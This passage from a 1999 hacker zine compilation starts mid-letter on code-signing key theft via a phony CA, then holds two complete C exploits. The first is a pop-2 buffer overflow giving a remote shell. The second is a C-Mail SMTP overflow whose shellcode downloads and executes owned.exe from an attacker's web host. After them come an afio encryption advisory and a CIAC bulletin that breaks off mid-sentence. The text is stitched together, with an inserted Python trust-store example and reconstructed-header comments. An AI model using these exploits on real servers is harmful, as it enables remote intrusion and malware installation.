code in a signed .cab file (signed with a cert that is signed from the
phony CA) onto the developer's machine (it's now trusted, so they will not
be given warnings -- and depending on their settings, they may not even be
*told anything*). That native code can use MS's CryptoAPI to retrieve the
developer's Authenticode private key (in typical fashion, the API does not
require a password to retrieve the key) and mail it out to the hacker.
That hacker then has someone else's code-signing cert and key. Using it,
they can put signed viruses around, and provide signed hacked versions of
software (perhaps providing a "mirror" of popular software all of which is
really just dressed-up and highly creative "fdisk" variations) -- and if
law enforcement ever get involved, their only lead will be the unfortunate
developer's Authenticode cert. Of course, if the hacker can plant phony CA
certs around everywhere, he/she can always just create their own phony
CA-signed Authenticode certs (perhaps named "Microsoft Corp.") and use
those. But the point being illustrated here is that the hacker only needs
to get the phony CA into *one* developer's machine (not everybody they want
to hack); after that, he/she has someone else's digital identity with which
to wreak havoc.
But this brings me around to an issue I had been wanting to mention, and
relates to a background project of mine. Microsoft has its own cert-trust
settings, store, and API (if any at all); so does Netscape, so does any
S/MIME-enabled mailer, so does any secure tunneling utility, etc. etc. Not
only has this led to a complete decentralisation (it's pretty much
"per-application") on a user's system as to his/her "trust" settings, it
has also led to the inevitable incompatibilities of standards -- just ask
anyone working for a CA about processing cert-requests for IE (and each
version thereof), Navigator, and the popular web-servers. They're all
various mutations and modifications of ASN, X509, PEM, and MIME that give
massive headaches for anyone who wants to dream of cross-compatibility (as
of now, I don't know anyone who has managed to make a single user-cert
(with private key) work on Communicator and IE simultaneously).
My idea had been loosely termed the "PKI kernel" -- a core library and
interface that is presumed present and callable on all systems being
compiled and deployed. Unlike the proliferation of various PKI toolkits
using various standards (PKIX, etc.) and proprietary interfaces, I wanted
to just put the minimum necessary core in to allow some centralisation --
and to ensure it was thin enough that it did not impose functional
restrictions on applications using it. E.g., I was thinking that this
should not be a "provider plug-in" architecture, as its very benefit would
come from it being singular and ubiquitous on a system. It would not
provide any cryptographic tools (ciphers, PKC encryption, etc.), and it
would not provide any services (SSL tunneling, SSH, etc.) -- it would
simply be a way to centralise root certs, user certs, pending
cert-requests, and private keys, and maintain policies as to their use. At
its most rudimentary, it could just be a free-for-all cert repository. At
its more refined, it could be a strict framework where a root-user has
stipulated that policies are inherited from another system and that only
certain certs can be used for certain things. E.g., an app can ask the
core for a list of "user certs" for use with "https" or check if a
particular CA cert is trusted for a certain task, the policy could
stipulate that any signed (user) certs imported into the core for use with
S/MIME must be at least 1024 bits and signed by the "X" CA, etc.
It just seems that each operating system has one concept of "print
management", or "the TCP/IP stack", etc., and yet every single
crypto-enabled program seems to have its own concept of trusted root certs,
cert-policies, key-usages, and all the incompatibilities that come with
them. They all use the same "protocols" (SSL/TLS, S/MIME, etc.), and they
all use the same "algorithms" (RC4, RSA, etc.), because everyone sensibly
agrees that it's best to just get one standard right than many different
standards simultaneously, yet it's often overlooked that authenticity and
identification depend very much on the careful and coordinated handling of
certification, which every application seems to want to have its own
individual poke at.
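As an added illustration of the per-purpose trust store Thorpe describes (example code, not his project's or any vendor's), the following Python models roots trusted per usage, default-deny for newly installed roots (the opposite of the all-boxes-ticked dialog he complains about), and an import policy such as the "at least 1024 bits and signed by the X CA" rule. Certificates are reduced to subject, issuer and key size; there is no real parsing or signature verification, and the CA and subject names are taken from the letter or made up.

```python
# Added example (not from the newsletter, nor any vendor's code): a small
# model of a central, policy-enforcing certificate store with per-usage trust.
from dataclasses import dataclass
from enum import Flag, auto
from typing import Dict, List, Optional


class Usage(Flag):
    NONE = 0
    SERVER_AUTH = auto()   # https server certificates
    CLIENT_AUTH = auto()   # https client certificates
    EMAIL = auto()         # S/MIME
    CODE_SIGNING = auto()  # Authenticode-style software signing


@dataclass(frozen=True)
class Cert:
    """Simplified certificate: no real ASN.1, no signature check (assumption)."""
    subject: str
    issuer: str
    key_bits: int

    @property
    def self_signed(self) -> bool:
        return self.subject == self.issuer


@dataclass(frozen=True)
class ImportPolicy:
    min_key_bits: int
    required_issuer: Optional[str] = None   # e.g. "X CA"


class PolicyError(Exception):
    pass


class TrustStore:
    def __init__(self):
        self._roots: Dict[str, Usage] = {}             # root subject -> granted usages
        self._policies: Dict[Usage, ImportPolicy] = {}
        self._user_certs: Dict[Usage, List[Cert]] = {}

    def add_root(self, root: Cert, usages: Usage = Usage.NONE) -> None:
        """Install a root. A new root is trusted for nothing until a usage is
        granted explicitly, rather than for everything by default."""
        if not root.self_signed:
            raise PolicyError("root must be self-signed")
        self._roots[root.subject] = usages

    def is_trusted(self, ca_subject: str, usage: Usage) -> bool:
        return bool(self._roots.get(ca_subject, Usage.NONE) & usage)

    def set_policy(self, usage: Usage, policy: ImportPolicy) -> None:
        self._policies[usage] = policy

    def import_user_cert(self, cert: Cert, usage: Usage) -> None:
        """Admit a user cert for one usage only if its issuer is trusted for
        that usage and the usage's import policy (key size, required CA) holds."""
        if not self.is_trusted(cert.issuer, usage):
            raise PolicyError(f"issuer {cert.issuer!r} not trusted for {usage.name}")
        policy = self._policies.get(usage)
        if policy is not None:
            if cert.key_bits < policy.min_key_bits:
                raise PolicyError(f"{cert.key_bits}-bit key below "
                                  f"{policy.min_key_bits} for {usage.name}")
            if policy.required_issuer and cert.issuer != policy.required_issuer:
                raise PolicyError(f"{usage.name} certs must be issued by "
                                  f"{policy.required_issuer!r}")
        self._user_certs.setdefault(usage, []).append(cert)

    def user_certs_for(self, usage: Usage) -> List[Cert]:
        """What an application asks for: the user certs usable for one purpose."""
        return list(self._user_certs.get(usage, []))


def demo() -> dict:
    """Walk through the letter's scenarios; returns the outcomes for checking."""
    store = TrustStore()
    store.add_root(Cert("X CA", "X CA", 2048), Usage.EMAIL | Usage.SERVER_AUTH)
    store.add_root(Cert("Phony CA", "Phony CA", 1024))   # installed, trusted for nothing
    store.set_policy(Usage.EMAIL, ImportPolicy(min_key_bits=1024, required_issuer="X CA"))
    store.set_policy(Usage.CODE_SIGNING, ImportPolicy(min_key_bits=1024))

    results = {"phony_signs_code": store.is_trusted("Phony CA", Usage.CODE_SIGNING)}
    for label, cert, usage in [
        ("weak_smime", Cert("alice@example.test", "X CA", 512), Usage.EMAIL),
        ("good_smime", Cert("alice@example.test", "X CA", 1024), Usage.EMAIL),
        ("phony_signer", Cert("Microsoft Corp.", "Phony CA", 1024), Usage.CODE_SIGNING),
    ]:
        try:
            store.import_user_cert(cert, usage)
            results[label] = "accepted"
        except PolicyError as e:
            results[label] = f"rejected: {e}"
    results["smime_certs"] = [c.subject for c in store.user_certs_for(Usage.EMAIL)]
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```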
** *** ***** ******* *********** *************
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
Please feel free to forward CRYPTO-GRAM to colleagues and friends who will
find it valuable. Permission is granted to reprint CRYPTO-GRAM, as long as
it is reprinted in its entirety.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.
Counterpane Systems is a six-person consulting firm specializing in
cryptography and computer security. Counterpane provides expert consulting
in: design and analysis, implementation and testing, threat modeling,
product research and forecasting, classes and training, intellectual
property, and export consulting. Contracts range from short-term design
evaluations and expert opinions to multi-year development efforts.
http://www.counterpane.com/
Copyright (c) 1999 by Bruce Schneier
@HWA
107.0 pop.c a pop-2 remote exploit by smiler
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
* A pop-2 remote exploit that gives a nobody shell.
* gcc pop.c -o pop -O3 -Wall
* Autodetects what version you're sploiting and adjusts ret position and
* offset accordingly.
* Tested on redhat 5.2, 5.1, 5.0 and 4.2. Probably only really useful
* using it on 5.2 tho, cos the rest will most likely have imap open too.
* NB: To exploit pop-2 you have to take into account the length of both
* the hostname and username(unlike all the pop2 exploits out there).
* - smiler
*/
/* Header names below are reconstructed: the angle-bracketed names were lost
 * when the zine was extracted. These are the standard headers the calls
 * (sockets, resolver, select, bzero, herror) need on Linux. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
unsigned char hellcode[]=
"\xeb\x2c\x5b\x89\xd9\x80\xc1\x06\x39\xd9\x7c\x07\x80\x01"
"\x20\xfe\xc9\xeb\xf5\x89\x5b\x08\x31\xc0\x88\x43\x07\x89"
"\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x31\xc0"
"\xfe\xc0\xcd\x80\xe8\xcf\xff\xff\xff\x0f\x42\x49\x4e\x0f"
"\x53\x48";
struct type {
char *text;
int offset;
int alignment;
};
struct type types[]={
{"4.46",0,0},
{"3.35",0,19},
{"3.44",0,19},
{"2.3(30)",0,19},
{NULL,0,0}};
int pop2_type = 0;
#define RET 0xbffff5b1
void usage(char *prog);
int resolv(char *hname, struct in_addr *addr);
int send_oberflow(int fd, char *host, char *user, int offset);
void run_shell(int fd);
int set_pop_type(char *buf, int n);
int do_connect(struct sockaddr_in *serv);
char temp_pass[20], *password;
int main(int argc, char **argv)
{
int fd,n;
unsigned char buf[2048];
struct sockaddr_in servaddr;
if (argc < 5)
usage(argv[0]);
password = strdup(argv[3]);
bzero(argv[3],strlen(argv[3]));
/* Mask the password from the cmdline =) */
bzero(&servaddr,sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(109);
if (!resolv(argv[4],&servaddr.sin_addr)) {
herror("resolv");
exit(-1);
}
fd = do_connect(&servaddr);
if ((n = recv(fd, buf, 1024, 0)) <= 0) {
perror("recv");
return -1;
}
/* Get the banner */
write(STDOUT_FILENO, buf, n);
set_pop_type(buf,n);
printf("Pop type = %d\n",pop2_type);
/* HELO localhost:dave password */
sprintf(buf, "HELO %s:%s %s\r\n",argv[1],argv[2],password);
send(fd, buf, strlen(buf), 0);
printf("Sleeping\n");
sleep(3);
n = recv(fd, buf, sizeof(buf), 0);
/* The optional offset is argv[5] (see usage); the original read argv[4],
 * which is the target host and always present. */
send_oberflow(fd, argv[1], argv[2], argc > 5 ? atoi(argv[5]) : 0);
// recv(fd, buf, sizeof(buf), 0);
run_shell(fd);
return 0;
}
void run_shell(int fd)
{
int n;
char recvbuf[1024];
fd_set rset;
while(1) {
FD_ZERO(&rset);
FD_SET(fd, &rset);
FD_SET(STDIN_FILENO, &rset);
select(fd+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(fd, &rset)) {
n = recv(fd, recvbuf, 1024,0);
if (n <= 0){
fprintf(stderr,"Connection closed\n");
return;
}
write(STDOUT_FILENO, recvbuf, n);
}
if (FD_ISSET(STDIN_FILENO, &rset)) {
n = read(STDIN_FILENO, recvbuf, 1024);
if (n <= 0) return;
send(fd, recvbuf, n, 0);
}
}
return;
}
int send_oberflow(int fd, char *host, char *user, int offset)
{
unsigned char buf[1050];
int ret,ctr,a = 0;
ret = 1016 - strlen(host) - strlen(user);
ret -= types[pop2_type].alignment;
memset(buf,0x90,sizeof(buf));
memcpy(buf,"FOLD ",5);
for (ctr = ret - strlen(hellcode);ctr < ret; ctr++)
buf[ctr] = hellcode[a++];
*(unsigned long *)(buf + ret) = RET + offset + types[pop2_type].offset;
strcpy(buf + ret + 4,"\r\n");
send(fd, buf, strlen(buf), 0);
return 1;
}
int do_connect(struct sockaddr_in *serv)
{
int fd;
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (fd < 0) {
perror("socket");
exit(-1);
}
if (connect(fd, (struct sockaddr *)serv, 16) < 0) {
perror("connect");
exit(-1);
}
return fd;
}
int set_pop_type(char *buf, int n)
{
int ctr = 0;
buf[n] = 0;
while(types[ctr].text) {
if (strstr(buf,types[ctr].text)) {
pop2_type = ctr;
return 1;
}
ctr++;
}
pop2_type = 0;
return pop2_type;
}
int resolv(char *hname, struct in_addr *addr)
{
struct hostent *res;
if (inet_aton(hname,addr))
return 1;
res = gethostbyname(hname);
if (res == NULL)
return 0;
memcpy((char *)addr,(char *)res->h_addr, sizeof(struct in_addr));
return 1;
}
void usage(char *prog)
{
/* Argument names reconstructed from how main() uses argv (the bracketed
 * names were stripped during extraction). */
fprintf(stderr,"Usage: %s <hostname> <user> <password> <target> [offset]\n",prog);
exit(-1);
}
@HWA
108.0 afio: security hole in 'afio -P pgp' encrypted archives
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 11 Jun 1999 16:55:30 -0000
From: cezar@CS.NET.PL
To: BUGTRAQ@netspace.org
Subject: (fwd) SECURITY: afio: security hole in 'afio -P pgp' encrypted archives
Hello,
Just found it on comp.os.linux.announce. Sorry if it was already on the list.
cezar
I believe that there are very few people who use afio's -P option for
encrypting afio archive contents with pgp. If you do not use afio,
pgp, or the 'afio -P pgp' option, it is safe to skip this message.
I. Description
Since version 2.4.2, the afio archiver has had an interface, the '-P
pgp' command line option, which can be used to pgp-encrypt the file
data written to an afio archive. Following up on some bug reports, I
have recently discovered a security problem with this afio-pgp
interface: pgp encryption is not always applied in the right way.
This makes it possible to crack the encryption on the file data in an
'encrypted' archive produced using afio with the '-P pgp' option.
The security of files which were already encrypted _before_ being
written to the archive is not affected. The security hole is not in
pgp itself, but in the interaction between afio and pgp. Other
programs which interact with pgp to encrypt things are very unlikely
to have a similar security hole.
II. Impact
It is possible to crack the encryption of at least some of
the file data in the 'encrypted' archives produced using 'afio -P
pgp'. This includes archives produced using the pgp_write example
script included in the afio distribution.
The attack against the broken archive encryption is obscure, but not
impossible to find. The next version of afio (due out in 1-n
months) will fix the security bug. By reverse-engineering the bug
fix, it will be easier to find the attack. So the release of the
next afio version will make already-existing 'afio -P pgp' archives
more vulnerable.
III. Solution
_Existing archives_ produced with 'afio -P pgp' should really be
treated with the same care (against theft etc.) as unencrypted
archives. If such existing archives cannot be deleted or safely
locked away, then encrypting the _entire_ existing archive file with
pgp will protect it. Such completely encrypted archives will _not_ be
fault-tolerant against storage media errors, like normal afio
archives are.
_New archives_ which really need to be protected with encryption can
be made by having afio output the archive to stdout and piping this
output through pgp: 'find [options] | afio -o [options] - | pgp
[options] >device_or_file'. Such encrypted archives will _not_ be
fault-tolerant against storage media errors, like normal afio
archives are.
The next version of afio (due out in 1-n months) will fix this
security hole by which 'afio -P pgp' creates unsafe archives.
On a personal note: I don't use PGP myself, and am not an expert in
dealing with security bugs. Obviously, reporting the existence of the
bug makes existing archives more vulnerable. Before I get flamed for
handling this in entirely the wrong way: yes, I did ask some experts
first, and this procedure is what came out.
Koen. (current afio maintainer)
--
This article has been digitally signed by the moderator, using PGP.
http://www.iki.fi/mjr/cola-public-key.asc has PGP key for validating signature.
Send submissions for comp.os.linux.announce to: linux-announce@news.ornl.gov
PLEASE remember a short description of the software and the LOCATION.
This group is archived at http://www.iki.fi/mjr/linux/cola.html
-- end of forwarded message --
--
cezar
CYBER Service / PKFL
@HWA
109.0 C-Mail SMTP Server Remote Buffer Overflow Exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 16 Jun 1999 16:42:43 -0400
From: pw
To: BUGTRAQ@netspace.org
Subject: C-Mail SMTP Server Remote Buffer Overflow Exploit
This is an exploit for a buffer overflow in the C-Mail SMTP Server
which recently had an advisory posted for it by the Eeye Digital Security Team. I
would like to thank them for telling me about the vulnerability before it was
released.
Everything is standard in the exploit except that the shellcode is placed
before the return address on the buffer, because there isn't enough room after it.
To execute the shellcode we put a small stub of code after our return address and
have the return address point to a jmp esp. The small stub of code when executed
points ecx to our shellcode and jumps to it. We can do this because ecx will
always point to the start of our shellcode's original buffer before its copied at
overflow time (at least in this version). This has been tested with only one
version of C-Mail, unfortunately I don't have the version number written down and
my evaluation period is up :). I can say that it is the version which was being
distributed from their web site about 2 months ago. There are return addresses in
the following exploit which should work under win95, 98 and NT. To
compile it under win32 just remove the "#define UNIX".
-mcp
<---------------------------CUT HERE------------------------>
#define UNIX
#ifndef UNIX
/* Header names reconstructed (lost in extraction); assumed Win32 set for
 * WSAStartup/Sleep/_close. */
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <io.h>
#define CLOSE _close
#define SLEEP Sleep
#else
/* Header names reconstructed (lost in extraction); standard Unix set for
 * sockets, resolver, bcopy and sleep. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define CLOSE close
#define SLEEP sleep
#endif
/*
CMail Exploit by _mcp_
Sp3 return address and win32 porting by acpizer
*/
const unsigned long OFFSET = 635;
const unsigned long LENGTH = 650;
const unsigned long CODEOFFSET = 11;
char code[] =
"\xEB\x53\xEB\x20\x5B\xFC\x33\xC9\xB1\x82\x8B\xF3\x80\x2B\x1"
"\x43\xE2\xFA\x8B\xFB\xE8\xE9\xFF\xFF\xFF\xE8\xE4\xFF\xFF\xFF"
"\xEB\x37\x46\x58\xFF\xE0\x33\xDB\xB3\x5B\xC1\xE3\x10\x66\xBB"
"\x18\x79\x56\xFF\x13\x8B\xE8\x46\x33\xC0\x3A\x6\x75\xF9\x46"
"\x83\xC0\x1\x3A\x6\x74\xDD\x56\x55\x33\xDB\xB3\x5B\xC1\xE3"
"\x10\x66\xBB\x44\x79\xFF\x13\xAB\xEB\xDF\xEB\x4F\x33\xC9\x66"
"\x49\xC1\xC1\x2\x51\x33\xC0\x51\x50\xFF\x57\xE8\x8B\xE8\x33"
"\xC9\x51\x51\x51\x51\x51\xFF\x57\xF4\x33\xC9\x51\x51\x51\x51"
"\x56\x50\xFF\x57\xF8\x59\x57\x51\x55\x50\xFF\x57\xFC\x83\xC6"
"\x7\x33\xC9\x51\x56\xFF\x57\xDC\xFF\x37\x55\x50\x8B\xE8\xFF"
"\x57\xE0\x55\xFF\x57\xE4\x33\xC9\x51\x56\xFF\x57\xEC\xFF\x57"
"\xF0\xE8\x59\xFF\xFF\xFF\x4C\x46\x53\x4F\x46\x4D\x34\x33\x1"
"\x60\x6D\x64\x73\x66\x62\x75\x1\x60\x6D\x78\x73\x6A\x75\x66"
"\x1\x60\x6D\x64\x6D\x70\x74\x66\x1\x48\x6D\x70\x63\x62\x6D"
"\x42\x6D\x6D\x70\x64\x1\x58\x6A\x6F\x46\x79\x66\x64\x1\x46"
"\x79\x6A\x75\x51\x73\x70\x64\x66\x74\x74\x1\x2\x58\x4A\x4F"
"\x4A\x4F\x46\x55\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71"
"\x66\x6F\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71\x66"
"\x6F\x56\x73\x6D\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x53"
"\x66\x62\x65\x47\x6A\x6D\x66\x1\x2\x69\x75\x75\x71\x3B\x30"
"\x30\x00";
/*This is the encrypted /~pw/owned.exe we paste at the end */
char dir[] =
"\x30\x7f\x71\x78\x30\x70\x78\x6f\x66\x65\x2F\x66\x79\x66\x1";
/*
Below is:
add ecx, 10
jmp ecx
We use this to transfer to our code that we store before the return address on
our overflow buffer, We have to do this because there isn't near enough room
behind the return address to include the code. If we weren't lucky enough to have
a register pointing virtually right to our code we could include a routine that
searches memory for specific dword in a specific direction relative to a
register's value then transfers control to our code located there. The code can
also be easily snuck in on another buffer by doing this.
*/
char controlcode[] =
"\x83\xc1\x0A\xFF\xE1";
unsigned int getip(char *hostname)
{
struct hostent *hostinfo;
unsigned int binip;
hostinfo = gethostbyname(hostname);
if(!hostinfo)
{
printf("cant find: %s\n",hostname);
exit(0);
}
#ifndef UNIX
memcpy((char *)&binip, hostinfo -> h_addr, hostinfo -> h_length);
#else
bcopy(hostinfo -> h_addr, (char *)&binip, hostinfo -> h_length);
#endif
return(binip);
}
int usages(char *fname)
{
printf("Remote Buffer Overflow exploit v1.2 by _mcp_ .\n");
printf("Win32 Porting and nt sp3 address By Acpizer \n");
printf("Usages: \n");
/* Bracketed argument names reconstructed from main(): they were stripped
 * during extraction. */
printf("%s <target> <http ip> <ret addr>\n", fname);
printf("win98:\n");
printf("<ret addr> = 0xBFF79243\n");
printf("NT SP3:\n");
printf("<ret addr> = 0x77E53FC7\n");
printf("NT SP4:\n");
printf("<ret addr> = 0x77E9A3A4\n");
printf("Will make running CSMMail download, save, and\n");
printf("execute http://<http ip>/~pw/owned.exe\n");
exit(0);
}
main (int argc, char *argv[])
{
int sock,targethost,sinlen;
struct sockaddr_in sin;
static unsigned char buffer[20000];
unsigned char *ptr,*ptr2;
unsigned long ret_addr;
int len,x = 1;
unsigned long rw_mem;
#ifndef UNIX
WORD wVersionRequested;
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD( 2, 2 );
err = WSAStartup( wVersionRequested, &wsaData );
if (err != 0) exit(1);
#endif
if (argc < 4) usages(argv[0]);
targethost = getip(argv[1]);
len = strlen(argv[2]);
if (len > 60)
{
printf("Bad http format!\n");
usages(argv[0]);
}
ptr = argv[2];
while (x <= len)
{
x++;
(*ptr)++; /*Encrypt the http ip for later parsing */
ptr++;
}
if( (sscanf(argv[3],"0x%x",(unsigned long *) &ret_addr)) == 0)
{
printf("Input error, the return address has incorrect format\n");
exit(0);
}
sock = socket(AF_INET,SOCK_STREAM,0);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = targethost;
sin.sin_port = htons(25);
sinlen = sizeof(sin);
printf("Starting to create the egg\n");
ptr = (char *)&buffer;
strcpy(ptr,"VRFY ");
ptr+=5;
memset((void *)ptr, 0x90, 7000);
ptr2=ptr;
ptr2+=OFFSET;
memcpy ((void *) ptr2,(void *)&ret_addr, 4);
ptr2+=8;
/* Put the code on the stack that transfers control to our code */
memcpy((void *) ptr2, (void *)&controlcode, (sizeof(controlcode)-1) );
ptr2=ptr;
ptr2+=LENGTH;
(*ptr2)=0x00;
ptr+=CODEOFFSET;
memcpy((void *) ptr,(void *)&code,strlen(code));
(char *) ptr2 = strstr(ptr,"\xb1");
if (ptr2 == NULL)
{
printf("Bad shell code\n");
exit(0);
}
ptr2++;
(*ptr2)+= len + ( sizeof(dir) );
(char *) ptr2 = strstr(ptr,"\x83\xc6");
if (ptr2 == NULL)
{
printf("Bad shell code\n");
exit(0);
}
ptr2+= 2;
(*ptr2)+= len + 8;
ptr+=strlen(code);
memcpy((void *) ptr, (void *) argv[2], len); /* Parse in the http site's info */
ptr+=len;
memcpy((void *) ptr,(void*) &dir, (sizeof(dir)-1) );
printf("Made the egg\n");
if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1)
{
perror("error:");
exit(0);
}
printf("Connected.\n");
#ifndef UNIX
send(sock, (char *)&buffer, strlen((char *)&buffer), 0);
send(sock,"\r\n",2,0);
#else
write(sock, &buffer, strlen((char *)&buffer) ); /* strlen((char *)&buffer */
write(sock,"\r\n",2);
#endif
SLEEP(1);
printf("Sent the egg\n");
#ifndef UNIX
WSACleanup();
#endif
CLOSE(sock);
exit(1);
}
@HWA
110.0 CIAC Bulletin J-044: Tru64/Digital UNIX (dtlogin) Security Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 11 Jun 1999 11:11:10 -0700 (PDT)
From: CIAC Mail User
To: ciac-bulletin@rumpole.llnl.gov
Subject: CIAC Bulletin J-044: Tru64/Digital UNIX (dtlogin) Security Vulnerability
[ For Public Release ]
__________________________________________________________
The U.S. Department of Energy
Computer Incident Advisory Capability
__________________________________________________________
INFORMATION BULLETIN
Tru64/Digital UNIX (dtlogin) Security Vulnerability
June 10, 1999 21:00 GMT Number J-044
______________________________________________________________________________
PROBLEM: There is a potential vulnerability with the
/usr/dt/bin/dtlogin in Compaq's Tru64/DIGITAL UNIX
software, where under certain circumstances, a user
may gain unauthorized access as superuser.
PLATFORM: Systems running Tru64/DIGITAL UNIX V4.0B,
V4.0D, V4.0E and V4.0F.
DAMAGE: Under certain circumstances, a user may gain
unauthorized access as superuser.
SOLUTION: Apply the vendor-supplied patch.
______________________________________________________________________________
VULNERABILITY The risk is high due to the possibility of gaining a root
ASSESSMENT: compromise.
______________________________________________________________________________
[ Start Compaq Computer Corporation Advisory ]
________________________________________________________
UPDATE: May 11, 1999
TITLE: Tru64/DIGITAL UNIX V4.0b, V4.0d, V4.0e and V4.0f
Potential Security Vulnerability
ref#: SSRT0600U "dtlogin"
SOURCE: Compaq Computer Corporation
Software Security Response Team
"Compaq is broadly distributing this Security Advisory in order
to bring to the attention of users of Compaq products the
important security information contained in this Advisory.
Compaq recommends that all users determine the applicability of
this information to their individual situations and take
appropriate action.
Compaq does not warrant that this information is necessarily
accurate or complete for all user situations and, consequently,
Compaq will not be responsible for any damages resulting from
user's use or disregard of the information provided in this
Advisory."
-----------------------------------------------------------------------
IMPACT:
Compaq has discovered a potential vulnerability with the
/usr/dt/bin/dtlogin in Compaq's Tru64/DIGITAL UNIX software,
where under certain circumstances, a user may gain unauthorized
access as superuser.
-----------------------------------------------------------------------
RESOLUTION:
This potential security problem has been resolved and a
patch for this problem has been made available for
Tru64/DIGITAL UNIX V4.0B, V4.0D, V4.0E and V4.0F.
Systems with enhanced security enabled and one or more of
the products listed below, should install this patch immediately.
- Distributed Computing Environment (DCE) from Compaq
- Advanced Server for Digital UNIX (ASDU) from Compaq
- AFS Enterprise File Systems from Transarc
- Kerberos 4 Network Authentication Protocol from MIT
If you need this patch for V4.0, V4.0A or V4.0C, please contact
your normal Compaq Services support channel.
*This solution will be included in a future distributed release of
Compaq's Tru64/DIGITAL UNIX.
This patch may be obtained from the World Wide Web at the
following FTP address:
http://www.service.digital.com/patches
Use the FTP access option, select DIGITAL_UNIX directory,
then choose the appropriate version directory and
download the patch accordingly.
Note: [1] The appropriate patch kit must be installed
following any upgrade to V4.0b, V4.0d, V4.0e or V4.0f.
[1a] These patches may be used on any patch kit/base level.
[2] IMPORTANT - Please review all README and
release notes which are related to this patch or an
official patch kit, prior to installation of this patch.
Additional Considerations:
This patch updates the following component:
/usr/dt/bin/dtlogin
If you believe you have, or aren't sure if you have, previously
installed a patch to this module you should contact your
normal Compaq Service channel.
Also, if you need further information, please contact your normal
Compaq Services support channel.
Compaq appreciates your cooperation and patience. We regret any
inconvenience applying this information may cause.
As always, Compaq urges you to periodically review your system
management and security procedures.
Compaq will continue to review and enhance the security
features of its products and work with customers to maintain and
improve the security and integrity of their systems.
________________________________________________________
Copyright (c) Compaq Computer Corporation, 1999 All
Rights Reserved.
Unpublished Rights Reserved under the Copyright Laws Of
The United States.
________________________________________________________
[ End Compaq Computer Corporation Advisory ]
______________________________________________________________________________
CIAC wishes to acknowledge the Compaq Computer Corporation for the information
contained in this bulletin.
______________________________________________________________________________
For additional information or assistance, please contact CIAC:
CIAC, the Computer Incident Advisory Capability, is the computer
security incident response team for the U.S. Department of Energy
(DOE) and the emergency backup response team for the National
Institutes of Health (NIH). CIAC is located at the Lawrence Livermore
National Laboratory in Livermore, California. CIAC is also a founding
member of FIRST, the Forum of Incident Response and Security Teams, a
global organization established to foster cooperation and coordination
among computer security teams worldwide.
CIAC services are available to DOE, DOE contractors, and the NIH. CIAC
can be contacted at:
Voice: +1 925-422-8193
FAX: +1 925-423-8002
STU-III: +1 925-423-2604
E-mail: ciac@llnl.gov
For emergencies and off-hour assistance, DOE, DOE contractor sites,
and the NIH may contact CIAC 24-hours a day. During off hours (5PM -
8AM PST), use one of the following methods to contact CIAC:
1. Call the CIAC voice number 925-422-8193 and leave a message, or
2. Call 888-449-8369 to send a Sky Page to the CIAC duty person or
3. Send e-mail to 4498369@skytel.com, or
4. Call 800-201-9288 for the CIAC Project Leader.
Previous CIAC notices, anti-virus software, and other information are
available from the CIAC Computer Security Archive.
World Wide Web: http://www.ciac.org/
(or http://ciac.llnl.gov)
Anonymous FTP: ftp.ciac.org
(or ciac.llnl.gov)
Modem access: +1 (925) 423-4753 (28.8K baud)
+1 (925) 423-3331 (28.8K baud)
CIAC has several self-subscribing mailing lists for electronic
publications:
1. CIAC-BULLETIN for Advisories, highest priority - time critical
information and Bulletins, important computer security information;
2. SPI-ANNOUNCE for official news about Security Profile Inspector
(SPI) software updates, new features, distribution and
availability;
3. SPI-NOTES, for discussion of problems and solutions regarding the
use of SPI products.
Our mailing lists are managed by a public domain software package
called Majordomo, which ignores E-mail header subject lines. To
subscribe (add yourself) to one of our mailing lists, send the
following request as the E-mail message body, substituting
ciac-bulletin, spi-announce OR spi-notes for list-name:
E-mail to ciac-listproc@llnl.gov or majordomo@rumpole.llnl.gov:
subscribe list-name
e.g., subscribe ciac-bulletin
You will receive an acknowledgment email immediately with a confirmation
that you will need to mail back to the addresses above, as per the
instructions in the email. This is a partial protection to make sure
you are really the one who asked to be signed up for the list in question.
If you include the word 'help' in the body of an email to the above address,
it will also send back an information file on how to subscribe/unsubscribe,
get past issues of CIAC bulletins via email, etc.
PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing
communities receive CIAC bulletins. If you are not part of these
communities, please contact your agency's response team to report
incidents. Your agency's team will coordinate with CIAC. The Forum of
Incident Response and Security Teams (FIRST) is a world-wide
organization. A list of FIRST member organizations and their
constituencies can be obtained via WWW at http://www.first.org/.
This document was prepared as an account of work sponsored by an
agency of the United States Government. Neither the United States
